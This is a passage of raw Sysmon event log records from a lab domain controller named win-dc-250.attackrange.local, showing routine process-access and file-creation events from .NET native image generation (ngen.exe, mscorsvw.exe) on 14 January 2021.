ndows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006596Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:54.498{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45AE-6000-7702-000000009A01}3700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006595Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:54.498{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45AE-6000-7702-000000009A01}3700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006594Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:54.452{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45AE-6000-7602-000000009A01}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006593Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:54.452{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45AE-6000-7602-000000009A01}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006592Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:54.452{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45AE-6000-7602-000000009A01}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006591Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:54.373{08A6967A-45AD-6000-7502-000000009A01}4172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\104c-0\System.DirectoryServices.AccountManagement.dll2021-01-14 13:22:54.373 10341000x80000000000000006618Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:55.858{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45AF-6000-7D02-000000009A01}4652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006617Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:55.858{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45AF-6000-7D02-000000009A01}4652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006616Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:55.858{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45AF-6000-7D02-000000009A01}4652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006615Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:55.811{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45AF-6000-7C02-000000009A01}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006614Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:55.780{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45AF-6000-7C02-000000009A01}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006613Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:55.780{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45AF-6000-7C02-000000009A01}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006612Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:55.717{08A6967A-45AF-6000-7B02-000000009A01}1396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\574-0\System.Dynamic.dll2021-01-14 13:22:55.717 10341000x80000000000000006611Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:55.342{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45AF-6000-7B02-000000009A01}1396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006610Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:55.327{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45AF-6000-7B02-000000009A01}1396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006609Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:55.327{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45AF-6000-7B02-000000009A01}1396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006608Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:55.202{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45AF-6000-7A02-000000009A01}3036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006607Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:55.186{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45AF-6000-7A02-000000009A01}3036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006606Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:55.186{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45AF-6000-7A02-000000009A01}3036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006605Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:55.124{08A6967A-45AE-6000-7902-000000009A01}4032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\fc0-0\System.Drawing.Design.dll2021-01-14 13:22:55.124 10341000x80000000000000006626Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:56.827{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B0-6000-7F02-000000009A01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006625Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:56.811{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45B0-6000-7F02-000000009A01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006624Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:56.811{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B0-6000-7F02-000000009A01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006623Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:56.655{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B0-6000-7E02-000000009A01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006622Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:56.655{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45B0-6000-7E02-000000009A01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006621Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:56.655{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B0-6000-7E02-000000009A01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006620Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:56.530{08A6967A-45AF-6000-7D02-000000009A01}4652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\122c-0\System.EnterpriseServices.dll2021-01-14 13:22:56.530 11241100x80000000000000006619Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:56.514{08A6967A-45AF-6000-7D02-000000009A01}4652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\122c-0\System.EnterpriseServices.Wrapper.dll2021-01-14 13:22:56.514 10341000x80000000000000006640Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:59.921{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B3-6000-8302-000000009A01}4004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+